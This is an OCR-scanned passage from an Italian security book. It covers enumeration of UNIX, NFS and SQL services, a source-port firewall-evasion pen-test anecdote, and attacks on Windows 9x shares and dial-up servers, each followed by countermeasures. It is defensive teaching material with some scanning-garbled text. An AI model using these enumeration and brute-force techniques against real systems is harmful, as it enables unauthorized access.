Semplicità: 8 
Impatto: 1 
Fattore di rischio: 4 


Scendendo nella catena alimentare al disotto di finger, troviamo due utility meno 
diffuse: rusers e rwho. rwho restituisce gli utenti attualmente connessi a un host re- 
moto su cui viene eseguito il daemon rwho (rwhod): 


[root$]rwho 192.168.202.34 

root localhost:ttyp0 Apr 11 09:21 
jack beanstalk:ttypi Apr 10 15:01 
jimbo 192.168.202.77:ttyp2 Apr 10 17:40 


rusers restituisce un elenco analogo, ma con il parametro -1 riporta informazioni 
aggiuntive, come il tempo trascorso dall’ultima digitazione da parte dell'utente. 
Queste informazioni sono fornite dal programma RPC rpc.rusersd, se esso è in 
esecuzione. Come spiegato nella parte precedente di questo capitolo, tipicamente i 
portmapper RPC vengono eseguiti sulle porte TCP/UDP 111 e TCP/UDP 32771 su 
alcune postazioni Sun. Di seguito è mostrato un esempio in cui il client rusers enu- 
mera gli utenti connessi a un sistema UNIX: 


[root$]rusers -1 192.168.202.34 
root 192.168.202.34:tty1 Apr 10 18:58 fa1 
root 192.168.202.34:ttyp0 Apr 10 18:59 102 (:0.0) 


© Contromisure a rwho e rusers 


Analogamente a quanto visto per finger, questi servizi devono essere semplice- 
mente disattivati. Poiché in genere essi vengono avviati indipendentemente dal su- 
perserver inetd, dovrete cercare riferimenti a rpc. rwhod e rpc. rusersd negli script 
di avvio (di solito si trovano in /etc/init.d/ e /etc/rce*.d) in cui i servizi autono- 
mi vengono attivati. Trasformate le righe opportune in commenti utilizzando il ca- 
rattere #. 


de 


® Enumerazione mediante NIS, programma RPC 100004 


Diffusione: 3 
Semplicità: 8 
Impatto: 1 
Fattore di rischio: 4 


Tra le altre potenziali fonti di informazioni sulle reti UNIX ricordiamo NIS (Network 
Information System), un notevole esempio di come un'ottima idea (un database di- 
stribuito contenente le informazioni sulla rete) possa venire implementata rivolgen- 
do scarsissima attenzione all'aspetto sicurezza. Il problema principale di NIS è che, 
una volta scoperto il nome di dominio NIS di un server, è possibile ottenere tutte le 
mappe NIS al suo interno mediante semplici interrogazioni RPC. Le mappe NIS 
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sono la rappresentazione distribuita delle informazioni critiche di ogni host di do- 
minio, come il contenuto del file passwd. Un classico attacco a NIS prevede l’utiliz- 
zo degli strumenti client per cercare di ricostruire il nome di dominio. In alternativa, 
uno strumento come pscan, sviluppato da Pluvius e disponibile su numerosi archivi 
per hacker presenti su Internet, può estrarre le informazioni più interessanti utiliz- 
zando il parametro -n. 


O Contromisure per NIS 


Un punto fermo degli utenti di NIS è “evitate di usare come nomi di dominio delle 
stringhe facili da individuare, come il nome della società, il nome nel DNS ecc.”, 
perché in questo modo si permette agli hacker di recuperare una serie di informa- 
zioni tra cui i database delle password. Se non avete in previsione di passare a 
NIS+, che supporta la cifratura dei dati e l'autenticazione su RPC protetta, almeno 
modificate il file /var/yp/securenets in modo da limitare l’accesso a reti e host 
prestabiliti, oppure compilate l'applicazione ypserv attivando il supporto opzionale 
per i wrapper TCP. Evitate inoltre di includere nelle tabelle NIS le informazioni sugli 
account root e di sistema. 


(Da 
(ai 


9 Enumerazione mediante il servizio 
di risoluzione SQL, porta UDP 1434 


Diffusione: 
Semplicità: 
Impatto: 

Fattore di rischio: 


Min Co vu 


Tradizionalmente, Microsoft SQL Server è sempre stato in ascolto delle connessioni 
dei client sulla porta TCP 1433. A partire però da SQL Server 2000, Microsoft ha in- 
trodotto la possibilità di ospitare diverse istanze di SQL Server sullo stesso computer 
fisico (potete immaginare che un'istanza sia un server SQL virtuale distinto). Il pro- 
blema è causato dal fatto che, in base alle regole del TCP/IP, la porta 1433 può fun- 
zionare unicamente come porta SQL di default per una delle istanze su una deter- 
minata macchina; le altre istanze devono essere assegnate a una porta TCP diversa. 
Il servizio di risoluzione dell’SQL Server stabilisce quali istanze sono in ascolto sulle 
varie porte per i client remoti (si tratta di un concetto analogo a quello del portmap- 
per RPC, ossia di una specie di “mapper delle istanze” SQL). Il servizio di risoluzio- 
ne dell’SQL Server rimane sempre in ascolto sulla UDP 1434 in SQL Server 2000 e 
versioni successive. 

Il servizio di risoluzione dell'SQL Server è rimasto nell'anonimato finché qualche fa- 
moso guru della sicurezza su SQL si è accorto che era attivo di default nelle installa- 
zioni SQL Server 2000, pronto a fornire informazioni sulle istanze locali di SQL Ser- 
ver (o anche peggio, come vedremo in seguito). Uno di questi superesperti, Chip 
Andrews di sglsecurity.com, ha rilasciato un prototipo di tool, chiamato SQLPing, 
che interroga la porta UDP 1434 e restituisce istanze in ascolto su una determinata 
macchina. Abbiamo utilizzato spesso SQLPing nelle valutazioni di client basate su 
Microsoft e la versione più recente di Chip (dotata di interfaccia grafica, scansione 
degli intervalli IP e identificazione delle password basata sulla forza bruta) è in gra- 
do di perlustrare allegramente gli ambienti SQL configurati in modo non corretto. 
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Pensate di essere al sicuro quando ascoltate su una porta non di default? Rifletteteci 
ancora. La Figura 3.14 mostra SQLPing 2.2 che esegue la scansione di alcuni indiriz- 
zi IP, sondando la UDP 1434 e provando la classica “password sa/null” contro tutte 
le istanze individuate. 


SQLPing2 by Chip Andrews - http:/Awmww.sqlsecurity.com 
Ele Settings Utility Help 
(+ Scan |P Range 

Scan From Live Address File 


Scan Range: 
Start IP Address: 


Live IP Addresses File: - 


Version 
8.00.194 


** Scanning Initiated ** 
Loading UserList 

no UserList - using 'sa' 
Loading PassList 

no PassList - using '' 
Scanning host : 192. 
Scanning host : 192. 
Scanning host : 192. 
Scanning host : 192. 
Scanning host : 192. 
Scanning host : 192. 


Figura 3.14 
SQLPing effettua scansioni alla ricerca di istanze di SQL Server e prova alcune password. 


A parte i vantaggi derivanti dall’individuazione di istanze SQL non di default, la 
presenza della UDP 1434 può anche indicare la presenza di un grave buffer over- 
flow basato sullo stack, scoperto da David Litchfield nel 2002 (consultare 
http://www.nextgenss.com/advisories/mssql-udp.txt e http://ww.microsoft 
.com/technet/security/bulletin/MS02-039.asp). 


© Contromisure all’enumerazione mediante istanze SQL 


Nel sito di Chip Andrews (http://ww.sqlsecurity.com) sono riportate diverse 
operazioni che potete effettuare per rendere invisibili i vostri server a tool quali 
SQLPing:. Il primo consiglio è quello di limitare l’accesso al servizio utilizzando un 
firewall. Più difficilmente attuabile il suggerimento alternativo di Chip: togliere tutte 
le librerie di comunicazioni di rete utilizzando Y’SNU (Server Network Utility). Questa 
operazione renderebbe il vostro server SQL sordomuto e ottuso a meno che non 
specifichiate “(local)” o un punto (.), nel qual caso saranno possibili solo connessio- 
ni locali. Infine, potete utilizzare l'opzione “hide server” sotto TCP/IP netlib 


Enumerazione III 


nell’SNU ed eliminare tutte le altre librerie di rete. Chip riferisce di aver constatato 
derive irregolari della porta TCP di default sulla 2433 quando ha eseguito questa 
operazione. State perciò molto attenti. 


NA 


‘#) Enumerazione mediante NFS, porta TCP/UDP 2049 


Diffusione: FA 
Semplicità: 10 
Impatto: 1 
Fattore di rischio: 6 


L'utility UNIX showmount consente l’enumerazione dei file system esportati con NFS 
sulla rete. Supponete, per esempio, che una precedente scansione su un possibile 
obiettivo abbia indicato che la porta 2049 (NFS) è in ascolto. showmount permetterà 
di scoprire esattamente quali directory vengono condivise: 


{[root$]showmount -e 192.168.202.34 
export list for 192.168.202.34: 


/pub (everyone) 
Ivar (everyone) 
Jusr user 


Il parametro -e restituisce l'elenco degli export del server NFS. 


Contromisure all’enumerazione mediante NFS 


Sfortunatamente, per questo problema non esistono particolari rimedi, in quanto si 
tratta del funzionamento standard di NFS. Assicuratevi che per i file system esportati 
siano definite correttamente le autorizzazioni (l’accesso in lettura/scrittura dovrebbe 
essere consentito solo agli host specificati) e che NFS venga bloccato sul firewall 
(porta 2049). Le richieste showmount possono anche essere registrate, cosa questa 
che può servire a intercettare intrusi malintenzionati. 

NFS non è più l’unico sistema di condivisione dei file system disponibile in 
UNIX/Linux, grazie alla crescente popolarità di Samba, una suite software open 
source in grado di fornire servizi file e di stampa ai client SMB (Server Message 
Block), che, come illustrato in precedenza, costituisce la base delle reti in ambiente 
Windows. Samba è disponibile all’indirizzo http://www. samba. org ed è incluso nel- 
le principali distribuzioni di Linux. Nonostante il file di configurazione del server 
Samba (../ete/smb.conf) preveda alcuni semplici parametri per la gestione della si- 
curezza, un errore di configurazione può comunque lasciare poco protette le condi- 
visioni in rete. 
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Hacking dei sistemi 


Hacking di Windows 95/98 e Me 
Hacking di Windows NT 
Hacking di Novell NetWare 
Hacking di UNIX 


JI. VU ada 
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Caso di studio: rischi del pen-testing 


Nella Parte II, “Hacking dei sistemi”, analizzeremo dettagliatamente i diversi tool e 
le tecniche utilizzate per ottenere l’accesso non autorizzato a sistemi di ogni tipo e 
modello: Windows 9x/Me/NT/2000/XP, Novell, UNIX, Linux e via dicendo. In que- 
sta trattazione, ci atterremo strettamente alla nostra metodologia per ottenere il con- 
trollo a livello superuser dei sistemi tramite la rete e a livello locale. 

Prima di dare inizio alla ricerca del superuser, è necessario segnalare un episodio 
recente verificatosi nel nostro lavoro di consulenti. Questo episodio reale mette in 
evidenza come una violazione di un sistema apparentemente insignificante possa 
tradursi in un’ingente perdita finanziaria. 

Nella nostra qualità di consulenti, abbiamo preso parte a decine di attacchi informa- 
tici simulati contro nostri clienti (una tecnica nota con il nome di penetration testing 
o pen-testing). In queste circostanze, dobbiamo spesso affrontare l'atteggiamento 
ostile degli esperti di tecnologie che lavorano per il cliente. Recentemente, abbiamo 
accettato un incarico in cui questo atteggiamento ostile si è rivelato maggiore; in ef- 
fetti, aveva tutta l’aria di un imminente tranello. 

Nel corso della riunione preliminare, ci siamo resi immediatamente conto che le re- 
gole di questo incarico erano distorte a favore del team degli addetti alla sicurezza. 
La nostra intuizione è stata confermata quando il cliente, la cui azienda vantava una 
massiccia presenza su Internet, ci ha fornito appena sette IP colpiti, scelti tra oltre 
65.000 possibili host. 

Ci è venuta alla mente una famosa battuta del film B/ues Brothers, “Mancano 106 
miglia a Chicago, abbiamo il serbatoio pieno, mezzo pacchetto di sigarette, è buio e 
portiamo tutti e due gli occhiali da sole”, seguita dall'altrettanto memorabile rispo- 
sta: “Vai!” 

Abbiamo iniziato con alcuni controlli ICMP preliminari per individuare gli host atti- 
vi, ma come al solito siamo rimasti a mani vuote (come la maggior parte delle reti 
affacciate su Internet, anche questa bloccava apparentemente le richieste di ping 
ICMP). Nella fase successiva abbiamo effettuato scansioni delle porte TCP e UDP, 
per individuare i servizi a nostra disposizione per l’attacco. Utilizzando il tool di 
scansione Scanline di Foundstone (http://www .foundstone.com) e l'opzione -p 
(affinché la scansione non fosse basata su ping), abbiamo individuato unicamente i 
servizi Web previsti, in esecuzione sulle porte TCP 80 e 443. Poiché ci siamo serviti 
anche dello switch -b di Scanline per acquisire simultaneamente i banner di servi- 
zio, i server sono stati rapidamente identificati come sistemi Microsoft Windows 
2000 mediante i loro banner IIS 5.0 HTTP: 


C:\>sl -p -b 192.168.1.10-16 
ScanLine (TM) 1.01 

Copyright (c) Foundstone, Inc. 2002 
http://ww.foundstone.com 


Scan of 7 IPs started at Mon Dec 30 15:30:23 2002 


192.168.1.10 

Responds with ICMP unreachable: No 
TCP ports: 80 

UDP ports: 
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TCP 80: 
[HTTP/1.1 200 OK Server: Microsoft-1I1S/5.0 Date: Mon, 30 Dec 2002 23:30:22 GMT P 


Scan finished at Mon Dec 30 15:30:48 2002 
7 IPs and 267 ports scanned in @ hours @ mins 25.13 secs 


I membri del nostro team hanno iniziato a perlustrare i server alla ricerca di punti 
vulnerabili IIS di dominio pubblico, ma non ne hanno individuato alcuno. Durante 
questa operazione, abbiamo utilizzato anche sl per effettuare scansioni complete 
delle porte TCP dei sette host, sperando di trovare un servizio poco noto che ci aiu- 
tasse a entrare passando dalla porta d’ingresso principale di questa rete parziale. Al 
termine delle scansioni complete, ci siamo trovati con un pugno di mosche. 

A un certo punto, nel corso dei nostri sforzi, ci siamo resi conto che non avevamo 
ancora tentato un astuto stratagemma noto come scansione delle porte di origine. Il 
concetto alla base di questa tecnica è semplice: si tratta di effettuare la scansione 
degli indirizzi IP mediante uno scanner delle porte in grado di modificare la porta di 
origine nel pacchetto TCP prima dell’invio alla destinazione. Saremmo diventati così 
un lupo travestito da agnello, “travestendo” le nostre scansioni da traffico potenzial- 
mente legittimo e, con un po’ di fortuna, eludendo il firewall perimetrale messo a 
protezione di questi server. Abbiamo nuovamente fatto riscorso a Scanline per age- 
volare l'inganno, servendoci dello switch -Qq per originare le nostre scansioni sulla 
porta TCP 20, utilizzata comunemente per i trasferimenti di dati con protocollo FTP. 
Quando abbiamo analizzato risultati della scansione, ci siamo resi conto che il no- 
stro errore sarebbe stato al tempo stesso la causa del nostro successo: 


C:\>sl -p -q 20 -t 135,139,445,1433,3389 -f our7hosts.txt 
ScanLine (TM) 1.01 

Copyright (c) Foundstone, Inc. 2002 
http://ww.foundstone.com 

Scan of 7 IP started at Fri Dec 31 23:59:59 1999 


192,168.1.10 
TCP ports: 1433 3389 


192.168.1.11 
TCP ports: 1433 3389 


Scan finished at Sat Jan 01 00:00:00 2000 
7 IPs and 14 ports scanned in 0 hours 0 mins 0.96 secs 


Sulla base dei risultati delle nostre scansioni, ci siamo resi conto che qualsiasi traffi- 
co con una porta di origine 20 e una porta di destinazione con numero superiore a 
1024 poteva attraversare impunemente il perimetro della rete. Avevamo trovato il 
modo per entrare. In un battibaleno, siamo riusciti a utilizzare un tool di reindirizza- 
mento del traffico della rete chiamato fpipe (http://ww.foundstone.com) per 
modulare i nostri attacchi successivi, in modo da sfruttare questo buco presente nel- 
la corazza della rete del cliente e perlustrare impunemente tutti i server che ci era- 
no stati segnalati. Ma siamo andati oltre: abbiamo utilizzato questa posizione privi- 
legiata per accedere a reti di preproduzione e amministrative, contenenti informa- 
zioni molto riservate, connesse ai server Web compromessi, In poche ore, siamo 
riusciti a mettere le mani sui “gioielli” dell'azienda del cliente. 
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Inutile dire che la riunione conclusiva con il nostro cliente fu molto istruttiva per il 
team responsabile della messa a punto dei controlli degli accessi lungo il perimetro 
della rete. 

Confidiamo che questo aneddoto serva a tutti (come è servito a noi) a rammentare 
che di solito c'è più di un modo per eludere le misure di sicurezza, anche quelle 
che all'apparenza sono più inossidabili. Confidiamo inoltre che esso abbia acuito la 
vostra curiosità per i capitoli di cui è costituita la Parte II, “Hacking dei sistemi”. 


Capitolo 4 
Hacking 
di Windows 95/98 e Me 


La cosa più importante che deve essere tenuta presente da un amministratore di si- 
stema o da un utente quando si fa riferimento ai sistemi operativi 95/95B/98/98SE e 
all’aggiornamento della loro controparte, Windows Millennium Edition (che d'ora in 
poi chiameremo Win 9x/Me o famiglia DOS), è che questi ambienti, al contrario del 
loro cugino Windows NT/2000, non sono stati progettati per essere sistemi operativi 
sicuri. 


gg =» Il termine “famiglia NT”, in questo volume, è da intendersi come riferito a 

DR tutti i sistemi operativi basati sulla piattaforma NT (New Technology) di 
Microsoft, alla quale appartengono le versioni 3.x e 4.x di Windows NT, 
Windows 2000, Windows XP e Windows.NET Server (che sarà trattato nel 
Capitolo 5). Laddove necessario, verrà evidenziata la differenza tra le ver- 
sioni per computer desktop e quelle per i server. Per fare riferimento ai si- 
stemi operativi DOS e Windows 1.x/3.x/9x/Me si utilizzerà il termine “fa- 
miglia DOS”. 


In effetti sembra che nella definizione dell’architettura di questi sistemi, Microsoft 
abbia operato molte scelte con l'intento di semplificare l'utilizzo del sistema a disca- 
pito della sicurezza. Questa potrebbe diventare un'arma a doppio taglio per gli am- 
ministratori e gli utenti che non conoscono i meccanismi riguardanti la sicurezza del 
sistema Windows. Non soltanto Windows 9x è facile da installare e da configurare, 
ma con molta probabilità gli utilizzatori eviteranno di prendere anche le più sempli- 
ci precauzioni per la sicurezza del sistema (come per esempio la scelta di una buo- 
na password). 

Inoltre qualche utente ignaro potrebbe configurare il suo sistema Windows 9x/Me 
in modo da fornire in modo inconsapevole una backdoor per l’accesso alla rete 
aziendale, oppure potrebbe memorizzare informazioni sensibili o in qualche modo 
riservate sul personal computer di casa collegato alla rete Internet, in genere più 
esposto agli attacchi. La crescita di virus e software dannosi trasmessi tramite e-mail 
in uscita dai sistemi compromessi complica ulteriormente il problema. Un unico 
ignaro utente di Win 9x che lancia un allegato di posta dannoso può creare una pe- 
ricolosa falla nel firewall attraverso la quale, stabilendo un collegamento con una 
rete dannosa, si può preparare il terreno per un’invasione su larga scala. 

Con la progressiva introduzione delle connessioni via cavo e DSL ad alta velocità, 
che permettono di mantenere sempre connessa una postazione alla rete Internet, 
questi problemi diventano sempre più attuali e consistenti. Sia che siate un ammini- 
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stratore di sistema, sia che utilizziate Win 9x per navigare nella rete Internet o acce- 
dere alla rete aziendale da casa, dovete essere a conoscenza degli strumenti e delle 
tecniche che possono essere utilizzate per attaccare il vostro sistema. 
Fortunatamente la semplicità di Windows 9x può risultare utile a chi si deve difen- 
dere dagli attacchi esteri, in quanto è possibile adottare semplici contromisure per 
proteggere il sistema. Dal momento che Windows 9x non è stato progettato per es- 
sere un vero sistema operativo multiutente, anche le sue possibilità di amministra- 
zione remota sono decisamente ridotte. È impossibile eseguire comandi remoti in un 
sistema Windows 9x tramite strumenti standard, mentre l'accesso al Registro di siste- 
ma di una postazione Windows 9x è possibile solamente se le richieste di accesso 
passano attraverso un server che fornisce un livello di sicurezza più elevato, come 
avviene su un server della famiglia Windows NT o Novell NetWare: in questo caso, 
alla sicurezza delle risorse locali condivise tipica dei sistemi Windows 9x/Me, basata 
su nome utente e password, viene aggiunta la protezione a livello di utente. (I siste- 
mi Windows 9x/Me non possono agire come server di autenticazione degli utenti.) 
Pertanto, la sicurezza dei sistemi Windows 9x/Me può essere compromessa attra- 
verso i metodi classici: configurazioni non corrette, ingannare l'operatore affinché 
esegua un codice, oppure ottenere l’accesso alla console del sistema. Per questo 
motivo abbiamo suddiviso il capitolo in base a questi due diversi metodi di attacco: 
remoto e locale. Win 9x verrà inoltre spiegato separatamente da Win Me, poiché i 
due sistemi operativi sono stati distribuiti a tre anni di distanza, anche se nella mag- 
gior parte dei casi gli attacchi contro 9x dovrebbero funzionare anche contro Me, 
tranne quando diversamente specificato. 

Se siete utenti Win9x/Me e vi state chiedendo se è opportuno aggiornare il vostro 
sistema operativo per desktop alla nuova versione Windows XP non abbiate dubbi, 
fatelo! XP è dotato di tutte le funzionalità di plug and play che un utente poco 
esperto può desiderare, di una stabilità dieci volte superiore a quella di altri sistemi 
operativi e di un sottosistema di sicurezza davvero efficiente, derivato da quello del- 
la famiglia NT e quindi nettamente diverso da quello dei sistemi operativi della fa- 
miglia DOS. Potete scegliere tra la Home Edition e la Professional Edition, a secon- 
da che desideriate disporre di un'interfaccia più semplice, dotata di utili procedure 
guidate, o di funzionalità più orientate alle realtà lavorative, come Connessione de- 
sktop remoto, Ripristino configurazione di sistema e diverse applicazioni avanzate 
per la gestione delle reti. Nel Capitolo 5 verranno descritti i prodotti per l'azienda di 
Windows NT, Windows 2000 e .NET Server 2003. 


Windows 9x/Me è giustamente classificato come una piattaforma utente. 
Spesso, il modo più semplice per attaccare questi sistemi è attraverso conte- 
nuti Web dannosi o messaggi di posta elettronica indirizzati direttamente 
all'utente, piuttosto che al sistema operativo. Per questo motivo vi consiglia- 
mo vivamente di leggere anche il Capitolo 16. 


Attacchi remoti a Windows 9x 


Le tecniche di attacco remoto del sistema Windows 9x possono essere divise in 
quattro categorie fondamentali: connessione diretta a una risorsa condivisa (com- 
prese le risorse di accesso remoto), installazione di un daemon di servizi che costi- 
tuisce una backdoor, attacco ai punti vulnerabili noti di applicazioni server e Denial 
of Service. Dovete osservare subito che ciascuna di queste situazioni richiede una 
modifica volontaria della configurazione oppure la sottovalutazione delle possibili 
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conseguenze di una certa operazione da parte dell’utente del sistema Windows 9x o 
dell’amministratore. Perciò questo genere di attacchi può essere evitato e neutraliz- 
zato con relativa facilità. 


Connessione diretta 
alle risorse condivise di Windows 9x 


Questo è il metodo più intuitivo e ovvio per aprire una breccia in un sistema Win- 
dows 9x remoto. Sono tre i meccanismi tramite i quali Windows 9x può fornire ac- 
cesso diretto al sistema: la condivisione di file e stampanti, l'installazione opzionale 
del server di accesso remoto e la manipolazione remota del Registro di sistema. Di 
questi tre metodi, l’accesso da posizione remota al Registro di sistema richiede una 
personalizzazione abbastanza avanzata del sistema e l'attivazione del controllo di 
accesso a livello utente; pertanto le condizioni che rendono possibile questo tipo di 
attacco si riscontrano raramente nelle postazioni presenti al di fuori di una rete 
aziendale. 

Una delle chiavi di accesso al primo tipo di attacco consiste nell’estorcere in qual- 
che modo le credenziali inserite da un utente remoto, che si sta collegando a una ri- 
sorsa condivisa del sistema Windows 9x. Poiché in genere gli utenti tendono a uti- 
lizzare sempre gli stessi nomi utente e password, è molto probabile che di questi ri- 
manga traccia sulla postazione remota utilizzata per la connessione. La situazione 
ipotizzata è abbastanza grave perché in questo modo vengono esposti all’intrusione 
anche altri sistemi connessi alla stessa rete. 


® Hacking dei file Windows 9x 
e delle stampanti condivise 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Abbiamo già trattato alcuni degli strumenti e delle tecniche che un hacker informa- 
tico può utilizzare per effettuare una scansione delle reti alla ricerca di condivisioni 
di stampanti e file (si veda il Capitolo 3) e abbiamo evidenziato come alcune di que- 
ste tecniche consentano di sferrare attacchi di ricerca ripetuta della password di ac- 
cesso alle risorse. Uno di questi strumenti è Legion, creato dal gruppo Rhino9. Oltre 
alla capacità di questo strumento di effettuare una scansione degli indirizzi IP alla ri- 
cerca di risorse condivise di Windows, Legion è distribuito con uno strumento chia- 
mato in inglese “BF tool” (dove BF è l'acronimo di bruze force, forza bruta), che è in 
grado di tentare l’accesso alle risorse individuate, utilizzando le password memoriz- 
zate in un elenco: in questo caso, più che di forza bruta si tratta più correttamente di 
un attacco basato su un dizionario di parole predefinito. Un suggerimento: il pul- 
sante Save Text presente nell'interfaccia principale di scansione delle reti di Legion 
consente di salvare l'elenco delle risorse individuate in un file di testo, facilitando le 
operazioni di copia e incolla nella casella di testo Path dello strumento BF, come 
mostrato nella Figura 4.1. 

Una volta ottenuto l’accesso alla risorsa, il danno che l’incursore è in grado di arre- 
care dipende dal tipo di risorsa che è stata condivisa dal sistema. In quella partico- 
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Force Share 


Paih [(\152 16 202. 38\MY_DOCUMENTS _ 
Word Lists TTI 
I ai os | 


D:\apps\NetBIOS\Legion\wordhst.txt 


lat [\\132 168,202 3E\MY_D 


Figura 4.1 
Lo strumento BF di Legion indovina le password delle risorse condivise di Windows, 


lare cartella potrebbero essere presenti file importanti, oppure l'utente del sistema 
potrebbe aver condiviso l’intera partizione radice, cosa che rende molto semplici 
all’hacker ulteriori azioni di pirateria. In questo caso è possibile copiare programmi 
eseguibili o daemon nella cartella %systemroot%\Menu Avvio\Programmi\Esecu- 
zione Automatica, affinché al successivo riavvio del sistema questi file eseguibili 
vengano avviati. (Potete fare riferimento ai successivi paragrafi in questo stesso ca- 
pitolo per comprendere cosa può succedere se un’applicazione, come Back Orifice, 
viene collocata nella cartella Esecuzione Automatica.) L'hacker potrebbe anche im- 
possessarsi dei file PWL, per poi decifrarli con tutta calma (anche per questo potete 
fare riferimento ai paragrafi successivi). 


[S] Contromisure all’attacco alle risorse condivise 


Questo tipo di intrusioni può essere evitato con facilità: disabilitate la condivisione 
di file e cartelle! Per gli amministratori di sistema che devono occuparsi di tenere 
sotto controllo un gran numero di postazioni, consigliamo l'utilizzo del programma 
System Policy Editor (POLEDIT.EXE), che permette di disabilitare la condivisione di 
file e stampanti in tutti i sistemi di una rete. Il programma POLEDIT.EXE, la cui 
schermata principale è visibile nella Figura 4.2, è disponibile insieme al Resource 
Kit di Windows 9x, detto anche Windows 9x RK, ma può essere reperito anche nel- 
la cartella \7oo/s\Reskit\Netadmin presente sulla maggior parte dei CD-ROM di in- 
stallazione di Windows 9x, oppure al sito di Microsoft all'indirizzo http://support. 
microsoft.com/support/kb/articles/Q135/3/15.asp. 

Se per voi è necessario attivare la condivisione di cartelle, scegliete una password di 
accesso alfanumerica di otto caratteri (la lunghezza massima della password con- 
sentita da Windows 9x) e inserite nella password anche metacaratteri (come per 
esempio [! @ # $ % &) oppure caratteri ASCII non stampabili. Può anche essere una 
cosa saggia utilizzare il simbolo $, come mostrato nella Figura 4.3, per terminare il 
nome assegnato alla connessione: in questo modo il nome della risorsa condivisa 
non appare nella cartella Risorse di rete, non è visibile nell’output del comando net 
view e non è rintracciabile nemmeno dal programma Legion. 
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#£ Proprietà - Computer predefinito 


Controllo di accesso 

Accesso 

Client Microsoft per reti NetWare 

Client Microsoft per reti Windows 
Condivisione di file e stampanti per reti Netw'are 


Figura 4.2 


Il System Policy Editor di Windows 9x consente agli amministratori 
di rete di impedire agli utenti di attivare la funzionalità di condivisione 
dei file, o di stabilire una connessione di accesso remoto. 


Proprietà 


Figura 4.3 


Aggiungete il simbolo $ al nome della risorsa che volete condividere 
per evitare che questa venga visualizzata tra le Risorse di rete 
e nell'output di molti strumenti di scansione NetBIOS. 
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® Ripetizione dell’hash di autenticazione di Windows 9x 


Diffusione: 8 
Semplicità: 3 
Impatto: 9 
Fattore di rischio: 7 


Il 5 gennaio 1999 il gruppo di ricerca conosciuto come LOpht ha pubblicato un docu- 
mento che mette in evidenza un difetto nelle procedure di autenticazione per l’accesso 
alla condivisione di file di Windows 9x fil testo del documento è disponibile all’indiriz- 
zo http://ww.atstake.com/research/advisories/1999/95replay.txt). Mentre i 
componenti del gruppo stavano verificando il funzionamento dell’ultima versione del 
loro strumento di riconoscimento e crack di password chiamato LOphterack (si veda il 
Capitolo 5), notarono che Windows 9x consentiva, durante l'autenticazione per l’ac- 
cesso alla condivisione dei file, di ripristinare una connessione alla risorsa condivisa, ri- 
petendo lo stesso messaggio alle richieste di connessione remota nell'arco di un perio- 
do di 15 minuti. Poiché Windows utilizza una combinazione del nome utente e di que- 
sto messaggio per effettuare un'operazione di hash (ossia di cifratura-decifratura) della 
password dell'utente remoto e dal momento che il nome utente viene trasmesso in 
chiaro, un eventuale hacker potrebbe semplicemente ripetere entro i quindici minuti 
successivi la trasmissione del messaggio di autenticazione già utilizzato per una con- 
nessione valida, per accedere con successo alla risorsa condivisa del sistema Win 9x. 
Durante questo periodo di tempo, infatti, l’identica stringa di cifratura della password 
resta valida per un tentativo di accesso successivo. 

Sebbene questo sia un classico errore crittografico che Microsoft avrebbe potuto 
certamente evitare, non è affatto banale riuscire a sfruttare questo meccanismo di 
autenticazione per un’intrusione. L'informativa pubblicata da LOpht suggerisce la 
possibilità di modificare il popolare client UNIX utilizzato per l’accesso alle risor- 
se di Windows, chiamato Samba (http://www.samba.org), in modo che possa 
essere utilizzato per registrare e ricostruire il traffico di rete utilizzato per la con- 
nessione e l’autenticazione a una risorsa condivisa di Windows. Per poter riusci- 
re in questa impresa, sono necessarie notevoli capacità di programmazione ed è 
indispensabile poter accedere al segmento di rete locale per “ascoltare” il traffico 
relativo alla connessione: queste sono probabilmente limitazioni troppo restritti- 
ve perché questa funzionalità anomala possa essere utilizzata da eventuali malin- 
tenzionati. 


® Hacking dei server di accesso remoto di Windows 9x 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


L’applet che fornisce le funzionalità di server di accesso remoto (dial-up server), in- 
clusa nella distribuzione di Windows 9x e mostrata nella Figura 4.4, è un’altra di 
quelle funzionalità considerate provvidenziali dagli amministratori di sistema. Qua- 
lunque utente potrebbe fornire un’involontaria backdoor alla rete aziendale, sem- 
plicemente collegando un modem alla propria postazione e installando il pacchetto 
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Microsoft Plus! per Windows 9x, che contiene i componenti server di accesso remo- 
to (nella versione Windows 98 il server di accesso remoto è addirittura incluso 
nell’installazione del sistema operativo). 


Trasformare un sistema Win 9x in un server 
di accesso remoto è davvero semplice. 


Una postazione Windows 9x configurata come server di accesso remoto avrà quasi 
sicuramente l'abilitazione alla condivisione dei file, poiché questo è il modo più 
proficuo per sfruttare le funzionalità di accesso remoto. È possibile dunque che, 
dall'altra parte del filo, possa essere tentato un attacco all'accesso delle risorse, cer- 
cando di utilizzare ricorsivamente un certo numero di password (se una password è 
stata impostata!): questo tipo di attacco può essere assimilato alle tipologie di 
hacking già viste nei paragrafi precedenti, con il presupposto che non sia stata con- 
figurata una password di accesso remoto nel sistema operativo. 


Contromisure agli attacchi 
al server di accesso remoto di Windows 9x 


Sono valide le stesse strategie di difesa già illustrate nel paragrafo precedente: non 
utilizzate il server di accesso remoto di Windows 9x e costringete gli utenti delle po- 
stazioni in una rete estesa a non utilizzarlo, impostando gli opportuni parametri nel 
Registro di sistema con il System Policy Editor. 

Se dovete assolutamente abilitare le funzionalità del server di accesso remoto, con- 
figurate una password di accesso, verificate che venga cifrata durante l’autenticazio- 
ne impostando le proprietà di connessione nella finestra di dialogo Tipi di Server, 
oppure effettuate l'autenticazione abilitando la condivisione delle risorse a livello 
utente (che corrisponde in pratica all'autenticazione dell’utente passando attraverso 
un server Windows NT o NetWare). Impostate ulteriori password per ciascuna risor- 
sa condivisa (utilizzando le buone regole di scelta della password illustrate nei pa- 
ragrafi precedenti) e aggiungete il simbolo $ al nome della condivisione. 
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I pirati informatici che riescono a intrufolarsi con successo nelle risorse di un server 
di accesso remoto, oltrepassando l’autenticazione, sono in grado di reperire qualun- 
que informazione disponibile sulla postazione server. Questo genere di intrusione 
non consente comunque di accedere ad altre risorse della rete locale sulla quale si 
trova il sistema, perché Windows 9x non è in grado di smistare il traffico di rete at- 
traverso il server di accesso remoto. 

È importante ricordare anche che le funzionalità di accesso remoto DUN (Dia/-Up 
Networking) non sono più riservate solamente all’utilizzo con il modem DUN: infatti Mi- 
crosoft mette a disposizione gli strumenti per costituire reti private virtuali, VPN (Virtual 
Private Network, di cui parleremo nel Capitolo 9) tramite accesso remoto. È necessario 
